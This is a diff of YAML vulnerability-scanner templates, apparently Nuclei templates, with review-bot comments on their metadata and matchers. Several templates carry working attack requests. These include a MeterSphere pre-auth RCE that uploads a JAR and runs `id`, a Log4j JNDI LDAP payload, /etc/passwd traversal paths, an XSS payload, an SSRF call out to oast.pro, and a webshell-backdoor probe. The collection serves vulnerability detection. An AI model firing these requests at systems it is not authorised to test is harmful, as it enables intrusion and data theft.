@@ -4,8 +4,10 @@ info: name: Magento Unprotected development files author: TechbrunchFR severity: high - description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers". - reference: https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing + description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to + Magento, "these tests are not supposed to end up on production servers". + reference: + - https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing tags: magento requests: diff --git a/vulnerabilities/metersphere/metersphere-plugin-rce.yaml b/vulnerabilities/metersphere/metersphere-plugin-rce.yaml new file mode 100644 index 0000000000..86ff474427 --- /dev/null +++ b/vulnerabilities/metersphere/metersphere-plugin-rce.yaml 
@@ -0,0 +1,59 @@ +id: metersphere-plugin-rce + +info: + name: MeterSphere Plugin Pre-auth RCE + author: pdteam,y4er + severity: critical + reference: + - https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/ + - https://github.com/metersphere/metersphere + tags: metersphere,rce,intrusive + +requests: + - raw: + - | + POST /plugin/add HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryreButJNjkCniQExX + + ------WebKitFormBoundaryreButJNjkCniQExX + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jar" + Content-Type: application/octet-stream + + {{base64_decode("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")}} + ------WebKitFormBoundaryreButJNjkCniQExX + Content-Disposition: form-data; name="request"; filename="blob" + Content-Type: application/json + + null + ------WebKitFormBoundaryreButJNjkCniQExX-- + + - | + POST /plugin/customMethod HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + + {"entry":"Evil","request":"id"} + + matchers-condition: and + matchers: + - type: word + words: + - '"data":' + - '"success":true' + condition: and + + - type: regex + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" \ No newline at end of file diff --git a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..5b1e366207 --- /dev/null +++ b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml 
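Review bot: The regex used by both the matcher and the extractor in the metersphere-plugin-rce hunk, `((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)`, accepts only one-to-four-digit ids and lower-case alphanumeric names, so `id` output such as `uid=10001(metersphere)` or a user name containing `-` or `_` fails the `and` condition even though the plugin executed; `[0-9]+\([a-z0-9_\-]+\)` covers the same successful cases without that gap. The first request also uploads a persistent `{{randstr}}.jar` plugin that the template never removes; the `intrusive` tag is right, but a `description` in `info` stating that a plugin artifact is left on the target, and that it must be deleted by hand, should accompany it. The JAR bytes are redacted in this view, so I cannot review what the uploaded plugin does beyond the `Evil` entry invoked with `id`.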
@@ -0,0 +1,47 @@ +id: mobileiron-log4j-jndi-rce + +info: + name: Ivanti MobileIron Log4J JNDI RCE + author: meme-lord + severity: high + description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker + who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + reference: + - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + - https://www.lunasec.io/docs/blog/log4j-zero-day/ + - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 + classification: + cve-id: CVE-2021-44228 + remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available. + tags: jndi,log4j,rce,cve,cve2021 + +requests: + - raw: + - | + POST /mifs/j_spring_security_check HTTP/1.1 + Referer: {{RootURL}}/mifs/user/login.jsp + Content-Type: application/x-www-form-urlencoded + + j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + +# Enhanced by cs on 2022/02/28 diff --git a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml index e5153a78ec..4c3f3c6236 100644 
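Review bot: The raw POST in the mobileiron-log4j-jndi-rce hunk carries no `Host: {{Hostname}}` header; every other raw-request template in this change sets it, HTTP/1.1 requires it, and a virtual-hosted MobileIron portal may answer with a default site rather than the login handler, so the line `Host: {{Hostname}}` should follow the request line. The `remediation` text, `Upgrade to version 2.14.2 or higher of MobileIron`, conflates the Log4j version line with the product: the description above says Log4j `<=2.14.1` is affected, and 2.14.2 is not presented anywhere in the references as a MobileIron release, so the line should cite the vendor patch named in the Ivanti/ZDNet reference and the fixed Log4j version the GHSA advisory gives — I am not asserting the exact numbers here. A sentence in `description` naming the `/mifs/j_spring_security_check` login endpoint the template exercises would also make manual reproduction easier.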
--- a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml +++ b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml @@ -1,11 +1,12 @@ id: moodle-filter-jmol-xss info: - name: Moodle filter_jmol - XSS + name: Moodle filter_jmol - Cross-Site Scripting author: madrobot severity: medium description: Cross-site scripting on Moodle. - reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ + reference: + - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ tags: moodle,xss requests: @@ -27,4 +28,4 @@ requests: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" diff --git a/vulnerabilities/moodle/moodle-xss.yaml b/vulnerabilities/moodle/moodle-xss.yaml index bb07fda91a..5dcfe36be5 100644 --- a/vulnerabilities/moodle/moodle-xss.yaml +++ b/vulnerabilities/moodle/moodle-xss.yaml @@ -1,12 +1,13 @@ id: moodle-xss info: - name: Moodle redirect_uri Reflected XSS + name: Moodle redirect_uri - Cross-Site Scripting author: hackergautam - description: XSS in moodle via redirect_uri parameter severity: medium + description: XSS in moodle via redirect_uri parameter + reference: + - https://twitter.com/JacksonHHax/status/1391367064154042377 tags: moodle,xss - reference: https://twitter.com/JacksonHHax/status/1391367064154042377 requests: - method: GET diff --git a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml index 75cc2ecdce..290e17322f 100644 --- a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml +++ b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml 
@@ -5,7 +5,8 @@ info: author: daffainfo severity: medium description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. - reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz tags: netsweeper,redirect requests: diff --git a/vulnerabilities/netsweeper/netsweeper-rxss.yaml b/vulnerabilities/netsweeper/netsweeper-rxss.yaml index 2eecc81e5b..18892a3101 100644 --- a/vulnerabilities/netsweeper/netsweeper-rxss.yaml +++ b/vulnerabilities/netsweeper/netsweeper-rxss.yaml @@ -1,10 +1,11 @@ id: netsweeper-rxss info: - name: Netsweeper 4.0.9 - Cross Site Scripting Injection + name: Netsweeper 4.0.9 - Cross-Site Scripting author: daffainfo severity: medium - reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz tags: netsweeper,xss requests: diff --git a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml index 0f66889dec..42aa25e801 100644 --- a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml +++ b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml @@ -4,11 +4,11 @@ info: name: Oracle EBS Bispgraph File Access author: emenalf,tirtha_mandal,thomas_from_offensity severity: critical - tags: oracle,lfi reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + tags: oracle,lfi requests: - method: GET diff --git a/vulnerabilities/oracle/oracle-ebs-xss.yaml b/vulnerabilities/oracle/oracle-ebs-xss.yaml index b684437823..23bd3eea02 100644 
--- a/vulnerabilities/oracle/oracle-ebs-xss.yaml +++ b/vulnerabilities/oracle/oracle-ebs-xss.yaml @@ -1,14 +1,14 @@ id: oracle-ebs-xss info: - name: Oracle EBS XSS + name: Oracle EBS - Cross-Site Scripting author: dhiyaneshDk severity: medium - tags: oracle,xss,ebs reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + tags: oracle,xss,ebs requests: - method: GET diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml index 3d3374470c..161b89486b 100644 --- a/vulnerabilities/oracle/oracle-siebel-xss.yaml +++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml 
@@ -1,12 +1,20 @@ id: oracle-siebel-xss info: - name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability + name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting author: dhiyaneshDK - severity: medium - description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. - reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - tags: xss,oracle + severity: high + description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. + reference: + - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html + - https://exploit-db.com/exploits/47762 + - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + remediation: Upgrade to Siebel Loyalty version 8.2 or later. + tags: xss,oracle,siebel requests: - method: GET @@ -27,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index f359c42b11..8e7f717257 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml 
@@ -1,11 +1,13 @@ id: oscommerce-rce info: - author: Suman_Kar name: osCommerce 2.3.4.1 - Remote Code Execution - description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the command's executed output - reference: https://www.exploit-db.com/exploits/50128 + author: Suman_Kar severity: high + description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the + command's executed output + reference: + - https://www.exploit-db.com/exploits/50128 tags: rce,oscommerce requests: diff --git a/vulnerabilities/other/3cx-management-console.yaml b/vulnerabilities/other/3cx-management-console.yaml new file mode 100644 index 0000000000..389cf88761 --- /dev/null +++ b/vulnerabilities/other/3cx-management-console.yaml @@ -0,0 +1,35 @@ +id: 3cx-management-console + +info: + name: 3CX Management Console - Directory Traversal + author: random-robbie + severity: high + description: Directory traversal vulnerability on 3CX Management Console. + reference: + - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 + metadata: + shoda-query: http.title:"3CX Phone System Management Console" + tags: 3cx,lfi,voip + +requests: + - method: GET + path: + - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json' + - '{{BaseURL}}/Electron/download/windows/\windows\win.ini' + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "CfgServerPassword" + - "CfgServerAppName" + condition: and + + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and 
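Review bot: The rewritten `description` in oscommerce-rce keeps the grammar slips of the old text (`allows ... attackers to injecting`, `to to read`) and now also wraps mid-sentence onto a second plain-scalar line, which YAML folds silently but which is easy to break on the next edit. A folded block keeps the long sentence wrap-safe: `description: >-` followed by the text indented one level, with `to inject` and `to read` corrected. The same mid-sentence plain-scalar wrap is introduced in the eyelock-nano-lfd hunk later in this diff.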
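Review bot: The metadata key is misspelled as `shoda-query` in the new 3cx-management-console template; the key used elsewhere in this diff (coldfusion-debug-xss, dedecms-carbuyaction-fileinclude, dedecms-openredirect) is `shodan-query`, so tooling that reads that key will silently ignore this value. Change it to `shodan-query: http.title:"3CX Phone System Management Console"`. Quoting the whole value in single quotes would also be safer, since a plain scalar with embedded double quotes parses today but reads as if it were a quoted string.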
diff --git a/vulnerabilities/other/74cms-sqli.yaml b/vulnerabilities/other/74cms-sqli.yaml deleted file mode 100644 index 904b2a3a57..0000000000 --- a/vulnerabilities/other/74cms-sqli.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: 74cms-sqli -info: - author: princechaddha - name: 74cms Sql Injection - severity: high - tags: 74cms,sqli - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a' - - matchers: - - type: word - words: - - "e807f1fcf82d132f9bb018ca6738a19f" - part: body diff --git a/vulnerabilities/other/WSO2-2019-0598.yaml b/vulnerabilities/other/WSO2-2019-0598.yaml new file mode 100644 index 0000000000..04fdb7b6f0 --- /dev/null +++ b/vulnerabilities/other/WSO2-2019-0598.yaml @@ -0,0 +1,28 @@ +id: WSO2-2019-0598 + +info: + name: WSO2 < 5.8.0 - Server Side Request Forgery + author: Amnotacat + severity: critical + description: | + This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 + remediation: | + Upgrade the product version to 5.8.0 or higher which are not affected by this SSRF vulnerability. + tags: ssrf,wso2,shindig + +requests: + - method: GET + path: + - "{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro" + + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/other/accent-microcomputers-lfi.yaml b/vulnerabilities/other/accent-microcomputers-lfi.yaml new file mode 100644 index 0000000000..76805df1c1 --- /dev/null +++ b/vulnerabilities/other/accent-microcomputers-lfi.yaml 
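Review bot: The request path in the new WSO2-2019-0598 template hard-codes the public `http://oast.pro` host and the matcher keys on the literal banner `Interactsh Server`, so every scan makes the target fetch a third-party host and the detection breaks the moment that banner text changes. Nuclei's `{{interactsh-url}}` placeholder with a `part: interactsh_protocol` matcher, the pattern the clockwatch-enterprise-rce template in this same diff uses, ties the SSRF check to the scanner's own callback and distinguishes a real outbound request from a string that merely appears in a body. Two smaller nits: `id: WSO2-2019-0598` is the only upper-case id in this batch, and the file ends without a trailing newline.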
@@ -0,0 +1,33 @@ +id: accent-microcomputers-lfi + +info: + name: Accent Microcomputers LFI + author: 0x_Akoko + severity: high + description: A local file inclusion vulnerability in Accent Microcomputers offerings could allow remote attackers to retrieve password files. + reference: + - https://cxsecurity.com/issue/WLB-2018050036 + - http://www.accent.com.pl + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: microcomputers,accent,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/vulnerabilities/other/antsword-backdoor.yaml b/vulnerabilities/other/antsword-backdoor.yaml new file mode 100644 index 0000000000..27ea2ed01c --- /dev/null +++ b/vulnerabilities/other/antsword-backdoor.yaml @@ -0,0 +1,36 @@ +id: antsword-backdoor + +info: + name: AntSword Backdoor Detection + author: ffffffff0x + severity: critical + description: An AntSword application backdoor shell was discovered. + reference: + - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-553 + remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. + tags: backdoor,antsword + +requests: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: 'ant=echo md5("antproxy.php");' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "951d11e51392117311602d0c25435d7f" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 
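Review bot: The new accent-microcomputers-lfi regex `root:[x*]:0:0` lacks the trailing colon that this same commit adds to the equivalent pattern in bems-api-lfi, bullwark-momentum-lfi and eyou-email-rce (`root:.*:0:0:`), and that the new dss-download-fileread and ecsimagingpacs-rce templates already use. For consistency and the slightly tighter match, use `- "root:[x*]:0:0:"`. The asanhamayesh-lfi template added in the next hunk has the same pattern. `name: Accent Microcomputers LFI` could also follow the `Product - Issue` form that the rest of this batch is being normalised to.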
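Review bot: `remediation` in the new antsword-backdoor template contains the typo `AnstSword`, and its first sentence tells the reader to reinstall AntSword, which from the request (`POST /.antproxy.php`) appears to be the client tool that drives the shell rather than something installed on the scanned host; the actionable advice is presumably to rebuild the compromised server and remove the dropped proxy script. A clearer line would be `remediation: Treat the host as compromised; rebuild it from a known-good image and remove .antproxy.php. Follow best practices for securing PHP servers/applications via php.ini and other mechanisms.` `cwe-id: CWE-553` (command shell in an externally accessible directory) fits the finding and can stay.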
diff --git a/vulnerabilities/other/asanhamayesh-lfi.yaml b/vulnerabilities/other/asanhamayesh-lfi.yaml new file mode 100644 index 0000000000..462ea627f3 --- /dev/null +++ b/vulnerabilities/other/asanhamayesh-lfi.yaml @@ -0,0 +1,25 @@ +id: asanhamayesh-lfi + +info: + name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018030006 + - https://asanhamayesh.com + tags: asanhamayesh,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml index ca498927f1..e6ce2c4e2f 100644 --- a/vulnerabilities/other/aspnuke-openredirect.yaml +++ b/vulnerabilities/other/aspnuke-openredirect.yaml @@ -9,9 +9,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569" + - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" + matchers: - type: regex - part: body + part: header regex: - - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$' \ No newline at end of file + - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' \ No newline at end of file diff --git a/vulnerabilities/other/avada-xss.yaml b/vulnerabilities/other/avada-xss.yaml new file mode 100644 index 0000000000..6c0001f1f3 --- /dev/null +++ b/vulnerabilities/other/avada-xss.yaml 
@@ -0,0 +1,34 @@ +id: avada-xss + +info: + name: Avada < 7.4.2 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue. + reference: + - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb + - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/ + tags: xss,wp,wordpress,wp-theme,avada + +requests: + - method: GET + path: + - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - 'avada-footer-scripts' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/bems-api-lfi.yaml b/vulnerabilities/other/bems-api-lfi.yaml index dfde5d648f..fa2efedbb9 100644 --- a/vulnerabilities/other/bems-api-lfi.yaml +++ b/vulnerabilities/other/bems-api-lfi.yaml 
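Review bot: The body matcher in the new avada-xss template requires only `">` and `avada-footer-scripts` under `condition: and`, and `">` closes an attribute in virtually every HTML document, so any Avada page that renders the search route will satisfy it whether or not the injected markup was reflected unescaped. The match should anchor on the reflected payload itself, i.e. the decoded form of what the path already sends, `- '</script><script>alert(document.domain)</script>'`, so that a properly escaped response is not reported as vulnerable. The `text/html` header check and the status check are fine as they are.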
@@ -1,11 +1,12 @@ id: bems-api-lfi info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + name: Longjing Technology BEMS API 1.21 - Arbitrary File Retrieval author: gy741 severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + description: The application suffers from an unauthenticated arbitrary file retrieval vulnerability. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php tags: lfi requests: @@ -17,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/vulnerabilities/other/beward-ipcamera-disclosure.yaml index 1dd105d3fd..7914b6da9f 100644 --- a/vulnerabilities/other/beward-ipcamera-disclosure.yaml +++ b/vulnerabilities/other/beward-ipcamera-disclosure.yaml 
@@ -1,13 +1,17 @@ id: beward-ipcamera-disclosure info: - name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure + name: BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure author: geeknik severity: high description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. reference: - https://www.exploit-db.com/exploits/46320 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: iot,camera,disclosure requests: @@ -26,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index b56424baca..676932a520 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: low description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. - reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html + reference: + - https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html tags: redirect,bitrix requests: diff --git a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml index dffb6b050f..d2f7caa672 100644 --- a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml +++ b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml 
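Review bot: The new classification block for beward-ipcamera-disclosure sets `PR:N` in `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N`, but the unchanged description two lines above says the camera suffers from an authenticated file disclosure vulnerability, so one of the two is wrong. If credentials really are required, `PR:L` gives `cvss-score: 7.7` (still `severity: high`); if the description is stale, it should say unauthenticated. Either way the vector, score and prose should be reconciled before the `# Enhanced by` marker is read as meaning the metadata was reviewed.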
@@ -4,7 +4,8 @@ info: name: Blue Ocean Excellence LFI author: pikpikcu severity: high - reference: https://blog.csdn.net/qq_41901122/article/details/116786883 + reference: + - https://blog.csdn.net/qq_41901122/article/details/116786883 tags: blue-ocean,lfi requests: diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index e8dd1b7e11..55d671db0b 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -30,4 +30,4 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml index 04a5d1b654..ef451efdd0 100644 --- a/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -4,7 +4,8 @@ info: name: Cacti Weathermap File Write author: pikpikcu severity: medium - reference: https://www.freebuf.com/articles/system/125177.html + reference: + - https://www.freebuf.com/articles/system/125177.html tags: injection,cacti requests: diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index 04795427db..11dea3cf9b 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -4,8 +4,9 @@ info: name: Caucho Resin Information Disclosure author: pikpikcu severity: info - reference: https://www.exploit-db.com/exploits/27888 - tags: exposure,resin + reference: + - https://www.exploit-db.com/exploits/27888 + tags: exposure,resin,caucho requests: - method: GET diff --git a/vulnerabilities/other/chamilo-lms-sqli.yaml b/vulnerabilities/other/chamilo-lms-sqli.yaml index 8a3b456b4d..0f8716056a 100644 --- a/vulnerabilities/other/chamilo-lms-sqli.yaml +++ b/vulnerabilities/other/chamilo-lms-sqli.yaml 
@@ -1,7 +1,8 @@ id: chamilo-lms-sqli + info: - author: undefl0w name: Chamilo LMS SQL Injection + author: undefl0w severity: high description: Finds sql injection in Chamilo version 1.11.14 tags: chamilo,sqli diff --git a/vulnerabilities/other/chamilo-lms-xss.yaml b/vulnerabilities/other/chamilo-lms-xss.yaml index 3af835083c..c7804b9001 100644 --- a/vulnerabilities/other/chamilo-lms-xss.yaml +++ b/vulnerabilities/other/chamilo-lms-xss.yaml @@ -1,10 +1,17 @@ id: chamilo-lms-xss info: - name: Chamilo LMS Cross Site Scripting + name: Chamilo LMS 1.11.14 Cross-Site Scripting author: geeknik - severity: medium - description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ + severity: high + description: Chamilo LMS 1.11.14 is vulnerable to cross-site scripting. + reference: + - https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ + - https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-45-2021-01-21-Moderate-impact-moderate-risk-XSS-vulnerability-in-agenda + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 tags: xss,chamilo requests: @@ -25,3 +32,5 @@ requests: part: header words: - "text/html" + +# Enhanced by mp on 2022/04/08 diff --git a/vulnerabilities/other/ckan-dom-based-xss.yaml b/vulnerabilities/other/ckan-dom-based-xss.yaml index cbfb774e69..7cc02f4bf3 100644 --- a/vulnerabilities/other/ckan-dom-based-xss.yaml +++ b/vulnerabilities/other/ckan-dom-based-xss.yaml 
